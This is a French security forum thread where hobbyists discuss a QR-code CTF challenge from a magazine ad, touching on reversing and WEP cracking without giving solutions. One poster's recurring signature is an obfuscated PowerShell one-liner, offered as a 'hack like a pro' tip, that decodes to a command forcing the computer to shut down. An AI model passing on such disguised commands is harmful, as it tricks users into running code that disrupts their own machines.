Annonce

Réduire
Aucune annonce.

Challenge de sécu

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Challenge de sécu

    Hello o/

    (J'espère que ce post a sa place ici).

    Ceux qui lisent MISC ont peut être remarqué une pub de NES qui contient un challenge de sécurité (mode CTF) sous la forme d'un QR-Code.
    J'ai voulu m'y essayer par curiosité, et j'avoue qu'il est plutôt intéressant et passe par pas mal de domaines - mais je ne veux pas spoiler le truc -.

    J'avoue que c'est le genre de projet que j'ai toujours aimé relever en équipe, dans la mesure où ça motive, en plus du partage de connaissances qui peut en résulter.

    Ca intéresserait certains d'entre vous ? Certains ont-ils déjà commencé à jouer avec ?
    (Si ça intéresse, je pourrai partager le point d'entrée du chall)

    o/

    ./Kriss
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

  • #2
    C'est vrai que le CTF par QR-code doit être intéressant. J'en ai fait quelques uns et ça peut vite devenir rotor si l'on y ajoute d'autres domaines.

    Commentaire


    • #3
      En fait le QR-Code c'est juste le support (et pour le coup ya rien à faire de particulier malheureusement, mais c'est vrai que ça doit pouvoir être marrant ) c'est juste ce qui conduit au Challenge en lui même.

      Le flash du QR code donne la chaine :
      T2JhYXIgcHVuYXByICEKdWdnYzovL292Zy55bC8xcWlZRkZFCnVnZ2M6Ly9vdmcueWwvMmFqZnI5bAp1Z2djOi8vb3ZnLnlsLzE4 ZXBiQlI=
      Et c'est seulement là que tout commence.
      Si y'a des amateurs du coup, mp c'est peut être pas mal pour éviter les spoils pour ceux qui voudraient le découvrir de A à Z.
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Je t'ai MP, j'ai passer les premières épreuves, là j'arrête même si je t'ai donner le processus que je compte suivre, j'ai d'autres trucs sur le feu et je veux pas m'éparpiller. En tout cas, sympas ce chall si tu a avancé plus loin dit moi sinon si tu bloque je pourrais t'aider aussi.

        Commentaire


        • #5
          Me manque plus qu'un flag... et faut faire du reverse sur un PE 32 bits... et c'est clairement pas mon fort (passé les crack-me niveau 1 disons )

          Du coup ! Si ya des chauds pour se lancer et me coacher sur le truc, ce sera pas de refus (en échange d'un coup de main sur les autres flags si vous voulez d'ailleurs).
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            Moi je sèche un peu sur la partie WIFI... Comment casser cette p.... de clef WEP avec seulement 300 IV...

            Commentaire


            • #7
              @testpresta2 : mp !
              Hack like a pro :
              PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

              Commentaire


              • #8
                En passant : résolu depuis un moment, si yen a qui bloquent ...
                Hack like a pro :
                PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                Commentaire

                Chargement...
                X